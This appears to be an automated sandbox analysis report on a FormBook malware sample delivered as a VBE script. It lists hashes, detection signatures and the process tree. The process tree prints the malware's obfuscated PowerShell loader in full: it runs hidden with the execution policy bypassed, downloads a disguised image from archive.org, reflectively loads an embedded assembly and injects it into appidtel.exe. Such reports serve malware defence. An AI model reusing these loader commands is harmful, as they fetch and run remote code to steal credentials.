Edit tour
Windows
Analysis Report
10092024150836 09.10.2024.vbe
Overview
General Information
| Sample name: | 10092024150836 09.10.2024.vbe |
| Analysis ID: | 1530632 |
| MD5: | 17cd7d0a0b68a5c484a848750820837a |
| SHA1: | bff3178427c48734726b5e144c86d0833cd8cc1f |
| SHA256: | 5d14ce5f262c2b1f20ed43231cd1ba696a1eac262da9e20d1415045e1a985eea |
| Tags: | vbeuser-abuse_ch |
| Infos: |   |
 | |
Detection
FormBook
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 7068 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\10092 024150836 09.10.2024 .vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
powershell.exe (PID: 6568 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' LiggJGVudj pjb21zcEVj WzQsMjYsMj VdLUpPSU4n JykoICgoJ3 swfWltJysn YWdlVXJsID 0gezF9aHR0 cHM6Ly9pYT YwMDEwJysn Mi51cy5hcm NoaXZlLm9y Zy8zMi9pdG UnKydtcy9k ZXRhaC1ub3 RlLXZfMjAy NDEwL0RlJy sndGFoTm90 ZScrJ19WLm pwZyB7MX07 ezB9d2ViQ2 xpZW50ID0g JysnTmV3LU 9iaicrJ2Vj dCBTeXN0ZW 0uTmV0Lldl YkNsaScrJ2 UnKydudDt7 MH1pbWFnZU J5dGVzID0g ezB9d2ViQ2 xpZW4nKyd0 LkRvd25sb2 FkRGF0Jysn YSh7MH1pbW FnZVVybCk7 ezB9aW1hZ2 VUZXh0ID0g W1N5c3RlbS 5UZXh0LkVu Y29kaW5nXT o6VVRGOC5H ZScrJ3RTdH JpbmcoezB9 aW1hZ2VCeX Rlcyk7ezB9 cycrJ3Rhcn RGbGFnID0g ezF9PDxCQV NFNjRfU1RB UlQ+PnsxfT t7MH1lbmRG bGFnID0gez F9PDxCQVNF JysnNjRfRU 5EPj57MX07 ezB9c3Rhcn RJbmRleCA9 IHswfWltYW dlVGV4dC5J bmRleE9mKH swfXN0YXJ0 RmxhZyk7ez B9ZW5kSW5k ZXggPSB7MH 1pbWFnZVRl eHQuSW5kZX hPZih7MH1l bmRGbGFnKT t7MH1zdGFy dEluZGV4IC 1nZSAwIC1h bmQgeycrJz B9ZW5kSW5k ZXggLWd0IH swfXN0YXJ0 SW5kZXg7ez B9c3RhcnRJ bmRleCArPS B7MH1zdGFy dEZsYWcuTG VuZ3QnKydo O3swfWJhc2 U2NExlbmd0 aCA9IHswfW VuZEluZGV4 IC0gezB9c3 RhcnRJbmRl eDt7MH1iYX NlNjRDb21t YW5kID0gez B9aW1hZ2VU ZXh0LlN1Yn N0cmluZyh7 MH1zdGFydE luZGV4LCcr JyB7MH1iYX NlNjRMZW5n dGgpO3swfW NvbW1hbmRC eXRlcyA9IF tTeXN0Jysn ZW0uQ29udm VydF06OkZy bycrJ21CYX NlNjRTdHJp bmcoezB9Jy snYmFzZTY0 Q29tbWFuZC k7ezB9bG9h JysnZGVkQX NzZW1iJysn bHkgPSAnKy dbU3lzdGVt LlJlZmxlY3 Rpb24uQScr J3NzZW1ibH ldOjpMb2Fk KHswfWNvbW 1hbmRCeXRl cyk7ezB9dm FpTWV0aG9k ID0gW2RubG liLicrJ0lP LkhvbWUnKy ddLkdldE1l dGhvZCh7MX 1WQUl7MX0p O3swfXZhaU 1ldGhvZC5J bnZva2Uoez B9bnVsbCwg QCcrJyh7MX 0wL2hCUEZt L2QvZWUuZX RzYXAvLzpz cHR0aHsxfS crJywgezF9 ZGVzYXRpdm Fkb3sxfSwg ezF9ZGVzYX RpdmFkb3sx fSwgezF9ZG VzYXRpdmFk b3sxfSwgez F9ZGVzYXRp dicrJ2Fkb3 sxfSwgezF9 MXsxfSwgez F9YXBwaWR0 ZWx7MScrJ3 0pKTsnKSAt ZiAgW2NIQX JdMzYsW2NI QXJdMzkpKQ ==';$OWjux d = [syste m.Text.enc oding]::UT F8.GetStri ng([system .Convert]: :Frombase6 4String($c odigo));po wershell.e xe -window style hidd en -execut ionpolicy bypass -No Profile -c ommand $OW juxD MD5: 04029E121A0CFA5991749937DD22A1D9) 
conhost.exe (PID: 380 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 1492 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and ".( $e nv:comspEc [4,26,25]- JOIN'')( ( ('{0}im'+' ageUrl = { 1}https:// ia60010'+' 2.us.archi ve.org/32/ ite'+'ms/d etah-note- v_202410/D e'+'tahNot e'+'_V.jpg {1};{0}we bClient = '+'New-Obj '+'ect Sys tem.Net.We bCli'+'e'+ 'nt;{0}ima geBytes = {0}webClie n'+'t.Down loadDat'+' a({0}image Url);{0}im ageText = [System.Te xt.Encodin g]::UTF8.G e'+'tStrin g({0}image Bytes);{0} s'+'tartFl ag = {1}<< BASE64_STA RT>>{1};{0 }endFlag = {1}<<BASE '+'64_END> >{1};{0}st artIndex = {0}imageT ext.IndexO f({0}start Flag);{0}e ndIndex = {0}imageTe xt.IndexOf ({0}endFla g);{0}star tIndex -ge 0 -and {' +'0}endInd ex -gt {0} startIndex ;{0}startI ndex += {0 }startFlag .Lengt'+'h ;{0}base64 Length = { 0}endIndex - {0}star tIndex;{0} base64Comm and = {0}i mageText.S ubstring({ 0}startInd ex,'+' {0} base64Leng th);{0}com mandBytes = [Syst'+' em.Convert ]::Fro'+'m Base64Stri ng({0}'+'b ase64Comma nd);{0}loa '+'dedAsse mb'+'ly = '+'[System .Reflectio n.A'+'ssem bly]::Load ({0}comman dBytes);{0 }vaiMethod = [dnlib. '+'IO.Home '+'].GetMe thod({1}VA I{1});{0}v aiMethod.I nvoke({0}n ull, @'+'( {1}0/hBPFm /d/ee.etsa p//:sptth{ 1}'+', {1} desativado {1}, {1}de sativado{1 }, {1}desa tivado{1}, {1}desati v'+'ado{1} , {1}1{1}, {1}appidt el{1'+'})) ;') -f [cH Ar]36,[cHA r]39))" MD5: 04029E121A0CFA5991749937DD22A1D9) 
appidtel.exe (PID: 1864 cmdline: "C:\Window s\SysWOW64 \appidtel. exe" MD5: 2C04FB942B2735073D75063E9FFBF50C) 
QEwzeZKCXN.exe (PID: 5908 cmdline: "C:\Progra m Files (x 86)\OUrqZI PcglSJTdAk vTvFHaJOth kOXBUHiliv dHaBzSySZb htKHPptGaW YehOtInhXk SFgRUUhhzH u\QEwzeZKC XN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717) - dllhost.exe (PID: 3516 cmdline:
"C:\Window s\SysWOW64 \dllhost.e xe" MD5: 6F3C9485F8F97AC04C8E43EF4463A68C) - QEwzeZKCXN.exe (PID: 524 cmdline:
"C:\Progra m Files (x 86)\OUrqZI PcglSJTdAk vTvFHaJOth kOXBUHiliv dHaBzSySZb htKHPptGaW YehOtInhXk SFgRUUhhzH u\QEwzeZKC XN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717) 
firefox.exe (PID: 4140 cmdline: "C:\Progra m Files\Mo zilla Fire fox\Firefo x.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
| Windows_Trojan_Formbook_1112e116 | unknown | unknown |
| |
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
| Windows_Trojan_Formbook_1112e116 | unknown | unknown |
| |
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
| Click to see the 14 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
| Windows_Trojan_Formbook_1112e116 | unknown | unknown |
| |
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
| Windows_Trojan_Formbook_1112e116 | unknown | unknown |
|
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||